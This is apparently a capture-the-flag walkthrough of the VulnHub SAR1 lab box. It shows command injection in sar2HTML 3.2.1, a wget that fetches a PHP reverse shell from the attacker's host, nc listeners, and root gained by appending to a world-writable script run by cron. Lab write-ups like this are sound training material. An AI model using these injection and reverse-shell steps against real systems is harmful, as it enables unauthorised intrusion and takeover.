VulnHub: SAR1 Walkthrough

SAR1 is another intentionally vulnerable box on VulnHub by love .

Enumeration

Starting enumeration with AutoRecon.

Nmap scan report for 192.168.50.149
Host is up, received arp-response (0.0063s latency).
Scanned at 2021-12-28 20:06:40 EST for 10s
Not shown: 999 closed ports
Reason: 999 resets
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))

Only one port is open. The very first page is a Apache default page. So, we look at the dirbusting results.

200      375l      964w    10918c http://192.168.50.149/index.html
200     1170l     5860w        0c http://192.168.50.149/phpinfo.php
200        1l        1w        9c http://192.168.50.149/robots.txt
403        9l       28w      279c http://192.168.50.149/server-status

/index.html is the Apache default page.

/phpinfo.php has all the info about the php env info.

/robots.txt has one entry which is /sar2HTML.

Browsing to /sar2HTML.

A quick google search shows /sar2HTML is a frontend performance monitoring tool which converts SAR data to graphical format.

The version of sar2HTML is 3.2.1 which has an RCE present at /sar2HTML/index.php?plot=;<cmd>

Initial Foothold

The above python script will automate the command injection.

┌──(root💀kali)-[~]
└─# python3 49344.py             
Enter The url => http://192.168.50.149/sar2HTML/
Command => whoami
HPUX
Linux
SunOS
www-data

And we have command injection on attacker's machine.

We can try and get a full blown tty shell.

My first attempt was with nc, however the shell didn't return any output.

Since, we were in the web root folder, I resorted to uploading a php file and executing the code by visiting the url.

Command => pwd
HPUX
Linux
SunOS
/var/www/html/sar2HTML

Command => wget http://192.168.50.129/php_reverse_shell.php

Command =>

Setup a nc listener on the port that was specified in the script and visit the URL.

http://192.168.50.149/sar2HTML/php_reverse_shell.php

┌──(root💀kali)-[~]
└─# nc -nlvp 443             
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.149] 51168
SOCKET: Shell has connected! PID: 3605
whoami
www-data
/bin/bash -i
/bin/bash: 0: can't access tty; job control turned off
www-data@sar:/var/www/html/sar2HTML$

We now have a shell as www-data.

Privilege Escalation

A little more enumeration, we get to kernel version and there are exploits but doesn't really work.

We also find a cron job which is executed every five minutes.

www-data@sar:/var/www/html$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

Looking at the contents of both the files:

www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh

#!/bin/sh

./write.sh

www-data@sar:/var/www/html$ cat write.sh
cat write.sh 

#!/bin/sh

touch /tmp/gateway

Finally.sh is only executing write.sh which is only creating a new file.

We can overwrite the file with a bash script which will send a reverse connection back to our machine.

www-data@sar:/var/www/html$ ls -la
ls -la
drwxr-xr-x 3 www-data www-data  4096 Oct 21  2019 .
drwxr-xr-x 4 www-data www-data  4096 Oct 21  2019 ..
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20  2019 index.html
-rw-r--r-- 1 www-data www-data    21 Oct 20  2019 phpinfo.php
-rw-r--r-- 1 root     root         9 Oct 21  2019 robots.txt
drwxr-xr-x 4 www-data www-data  4096 Dec 29 17:35 sar2HTML
-rwxrwxrwx 1 www-data www-data    30 Oct 21  2019 write.sh

We have write permission for write.sh which we will overwrite.

We already have a php_reverse_shell.php file in web root folder which we can again utilise.

We'll append the following string to the file which shall execute the php file.

www-data@sar:/var/www/html$ echo 'php ./var/www/html/sar2HTML/php_reverse_shell.php' >>write.sh

Setup a listener again and we shall receive a shell back.

┌──(root💀kali)-[~]
└─# nc -nlvp 443                                                                                                                                                       1 ⨯
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.149] 37390
SOCKET: Shell has connected! PID: 3174
whoami
root
cd /root
ls
root.txt
snap
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99

And we have our root flag.

Thanks for reading.